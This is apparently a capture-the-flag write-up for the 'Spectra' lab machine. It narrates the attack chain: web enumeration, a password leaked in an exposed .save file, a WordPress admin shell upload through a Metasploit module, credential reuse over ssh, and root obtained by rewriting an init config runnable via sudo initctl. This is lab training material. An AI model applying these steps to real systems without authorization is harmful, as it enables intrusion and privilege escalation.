Enumeration
The start step for this box is as usual. I am using nmap to check which ports are open and what services are there.
As you can see there are several ports open. In general I start my recon from port 80. Port 80 means that there is some kind of a web page. Usually from previous experience I edited my /etc/hosts file to add spectra.htb. At first glance at the page … well it does not give a lot of information. There are 2 links and of course the rule is “Click all links” so I did that.
I run also dirbuster in the background because one of the pages looked like a WordPress blog.
I discovered that I can browse the directory /testing and that there are interesting files to look at.
As you can see from the picture above one of the files looks really interesting because of the .save extension. I tried opening it but i got a blank page, which was odd, so I decided to look at the page source. And behold there is some code and useful info. I will not put a screen shot because it would be nice for the reader (YOU) to take a look and try to find the useful information. It sucks I know but that will help you learn.
After finding the password, well I needed a user name. Luckily as I mentioned this is a WordPress site so we can find a username from who have posted stuff on the website.
Also there is “log in” link that you need to go to. So now I have a username and a password. Lets login and see whats going on.
Foothold:
After I logged in I started to look around for more useful information. There was nothing of value around in the beginning until I decided to see which version of WP is running. After some googling I saw that metasploit module can be used. The module is: unix/webapp/wp_admin_shell_upload.
You can check the options and do the setup by yourself. If you have issues with that please leave a comment and I would try to help. After execution we have a meterpreter shell which is awesome.
USER:
I spend some time looking around, and found something interesting. There is a file in the /opt. Examining the file lead me to to another file that was supposed to hold a password and it DID. So now we have a username “katie” and a password. I tried switching users but it didn’t work, so I tried ssh-ing with this credentials and …. it worked. Now you can get the USER FLAG.
If you get stuck, you can join our discord server. Even if you are not join and lets learn new things.
Root:
Getting root was not that hard. I just checked what I can run as sudo while being the current user. you can do that by using "sudo -l". We can see that “katie” can execute "/sbin/initctl" as root. If you want to know more about what initctl does read here.
We can use initctl to control processes. We can stat and stop them which will help us escalate privileges for that box. If w run ls -l while in the /etc/init folder we can see there are many files, however the files with the name test***.conf are kind of interesting. I focused on test.conf and if you check whats inside. The idea is to change the whats in that file with our own code, so we can run /bin/bash with root permissions while being the user “katie”.
To do the above mentioned I found an interesting article. Follow the instructions there and you will reach the goal of obtaining the root flag. There is a Cron job that runs every 10 seconds that will run the test file. The link can be found bellow.
Conclusion
Thank you for reading the write up. If you get stuck somewhere please leave a comment and I will try to point you in the right direction.
